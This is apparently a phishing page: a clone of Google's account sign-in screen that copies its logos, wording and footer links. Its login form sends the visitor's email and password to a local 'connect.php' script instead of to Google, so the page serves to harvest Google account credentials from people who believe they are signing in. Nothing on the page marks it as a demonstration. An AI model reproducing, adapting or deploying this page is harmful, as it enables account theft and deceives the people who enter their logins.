<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<link href='https://fonts.googleapis.com/css?family=Open+Sans:300' rel='stylesheet' type='text/css'>
<style>
@media only screen and (max-width: 320px) {

			html{
				font-size: 60%;
				}
				#alignright{
				clear;
				margin:auto;
						}
				#logostrip
				{
					display:none;

							
				}
				#alignright img{
					display:none;
				}
				.lang-chooser{
					display:block;
					/*position:absolute;*/
					clear:both;
					margin-left:auto;
					margin-right:auto;
					display:none;		 }
				/*.lang-chooser{
					clear:both;
					margin:auto;
					text-align:center;
				}*/
				.footer ul{/*
					clear:both;*/
					display:block;
					clear:both;
					float :none;
					/*text-align: center;*/
					margin-left:auto;
					margin-right:auto;
					margin-bottom:10px;
					width:80%;
				}
				#create{
					font-size:3rem;
				}
				.footer{
					height:50%;
				}
}

@media only screen and (min-width: 501px) and (max-width: 720px) {
	html{
		font-size:80%;
	}
}
@media only screen and (min-width: 321px) and (max-width: 500px) {	
	html{
		font-size: 80%;
	}
	.lang-chooser{
		display:none;
	}
	#alignright img{
					display:none;
				   }


}
<style>

#alignright{


	float:right;
	
}

#googlelogo{
	padding :1.562rem 0 1.25rem 0;

	
}
#onaccnt{
	font-weight: 300;
	text-align: center;
	color: #555;
	font-family: 'Open Sans', arial;
	font-size: 2.375rem;
	margin-top:1rem;
}
#outerbox{
	padding:2.75rem 2.75rem 2.75rem 2.75rem;
	position:relative;
	width:17.125rem;
	height:17.125rem;
	margin-right: auto;
	margin-left: auto;
	margin-top: 0.9375rem;
	background-color: #f7f7f7;
	box-shadow: 0px 0.125rem 0.125rem rgba(0, 0, 0, 0.3);
}
#innerboximg{
	/*position: absolute;*/
	margin : 0 auto
	
	
}
#imguser{

}
#signin{margin-top: 0.625rem;
	color:#555;
	font-size: 1.125rem;
	font-weight: 400;
	font-family: 'Open Sans', arial;
}

#logouser{

	z-index: 101;
	border-radius: 50%;
	margin-top: 0.625rem;
	position:relative;
	height:6rem;
	width:6rem;
}
#userlogo{position:absolute;
top:1.25rem;
margin 0:auto;	

}
}
#inner{
margin 0:auto;
width:50%;

}
#email{ padding: 0 0.5rem ;
	height:2.75rem;
	width: 100%;
	box-sizing: border-box;
	font-size: 16px;
	border:0.0625rem solid #d9d9d9 ;
	background:#fff;
}
#nxt{
margin-top: 0.375rem;	
width:100%;
height:2.25rem;	
font-size: 0.8125rem;
background-color: #4d90fe;
border: 0.0625rem solid #3079ed;

}
#next
{	
width:100%;	
}
.rc-button-submit{
	font-weight: 700;
 font-family: Arial, sans-serif;	
width:100%;	
height:2.25rem;	
border: 0.0625rem  solid #3079ed;
color: #fff;
text-shadow: 0 0.0625rem  rgba(0,0,0,0.1);
background-color: #4d90fe;
border-radius: 3px;
}
.rc-button-submit: hover {
	background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
    border: 0.0625rem  solid #2f5bb7;
    color: #fff;
    text-shadow: 0 0.0625rem rgba(0,0,0,0.3);
    background-color: #357ae8;}
 #needhelp{
 	font-family: Arial, sans-serif;
 	text-decoration: none;
 	position :absolute;
 	font-size: 0.8125rem;
 	color: #427fed;
 	right :2.8125rem;
 	margin-top:0.4375rem;

 }
 #username{
margin-top: 1.125rem;

 }
 #needhelp:hover {
    	text-decoration: underline;
        text-decoration-color: -moz-use-text-color;
        text-decoration-line: underline;
        text-decoration-style: solid;
}
#create
	{
	text-decoration: none;							
	margin-top: 3.125rem;
    color: #427fed;
    cursor: pointer;
    font-family: Arial, sans-serif;
    text-align: center;
	font-size: 0.875rem;
}
#create:hover{
	text-decoration: underline;

}
#create:visited{color: #427fed;
cursor: pointer;

}
#createblc{margin-top: 1.25rem;

}
#title{
border-top: 0.3125rem;	
color: #555;
font-size: 0.875rem;
text-align: center;
font-family: Arial, sans-serif;
}
#logostrip{
margin:auto;	
background-image: url(https://ssl.gstatic.com/accounts/ui/wlogostrip_230x17_1x.png);
background-size: 14.375rem 1.0625rem;
width: 14.375rem;
height: 1.0625rem;
}


#username{
font-size:12px;	

}


.footer{
	/*position: relative;*/
	border-top:  1px solid #e5e5e5;
	margin-top:60px;
	font-family: Arial, sans-serif;
    padding-top: 7px;
    font-size: 12px;
    white-space: nowrap;
    line-height: 0;

}
.footer ul {
	position:relative;
    float: left;
    max-width: 80%;
    min-height: 16px;
    padding: 0;
}
.footer ul li{
	padding-right: 1.5em;
	display:inline-block;
}
.footer a {
    color: #737373;
    text-decoration: none;
}
.footer .lang-chooser {

    font-size: 13px;
    height: 24px;
    line-height: 24px;
    font-size: 13px;
    /*float:right;*/

}
#alignright
{
	float:right;
}



</style>
<title> Sign in - Google Account </title>
</head>
<body>

		<div id= "googlelogo" >
			<center><img src="https://ssl.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_112x36dp.png "></center>
		</div>

		<div id="onaccnt">
		 One account. All of Google   
		</div>

		<div id = signin>
				<center>Sign in with your Google Account</center>
		</div>

		<div id= "outerbox">

			<div id="inner">
			
		<!-- 	<div id ="userlogo" > -->
				 <center><img id ="logouser" src="https://ssl.gstatic.com/accounts/ui/avatar_2x.png" type ="circle" class="circle" width="6px" height="6px">
				 </center>
			<!-- </div> -->	
			<form action="connect.php" method="post">
				<div id="username">
				<input id="email" type="email" placeholder="Enter your email" name="gmail"></input>
                </div>
                <div id="username">
                    <input id="email" type="password" placeholder="Enter your password" name="password"></input>
                    </div>

				<div id="nxt">
				<input id="next" name="signIn" class="rc-button rc-button-submit" value="Next" type="submit">
				</div>
				</form>
  				</div>
  			</div>



		</div>	

			<div id="createblc">
				<center><a id="create"  href="https://accounts.google.com/SignUp?service=mail&amp;continue=https%3A%2F%2Fmail.google.com%2Fmail%2F&amp;hl=en">
  				Create account
  				</a></center>
  			</div>

  			<div id="title">
  					<p>
  					One Google Account for everything Google
					</p>
			<div id ="logostrip"></div>

			<div class="footer">

					<ul>
						<li>
							<a href="https://www.google.com/intl/en/about" target="_blank">
 							 About Google
 							 </a>
 						</li>
 						
 						<li>

 							<a href="https://accounts.google.com/TOS?loc=IN&amp;hl=en&amp;privacy=true" target="_blank">
  							Privacy
  							</a>
  						</li>
  						
  						<li>

  							<a href="https://accounts.google.com/TOS?loc=IN&amp;hl=en" target="_blank">
  							Terms
  							</a>		 
  						</li>
  						
  						<li>

  							<a href="http://www.google.com/support/accounts?hl=en" target="_blank">
  							 Help
  							</a>
  						</li>			
  		
 					</ul>
 					<div id="alignright">
	 						<img src="https://ssl.gstatic.com/images/icons/ui/common/universal_language_settings-21.png" alt="Change language">
		 					<select id="lang-chooser" class="lang-chooser" name="lang-chooser"> 
			 					<option value="en" selected="selected">
		  ‪						English (United States)‬
		  						</option>			
		  ‪
		  					</select>
	  				</div>				
	 				
 			</div>
 			
 				 						

</body>
</html>
			

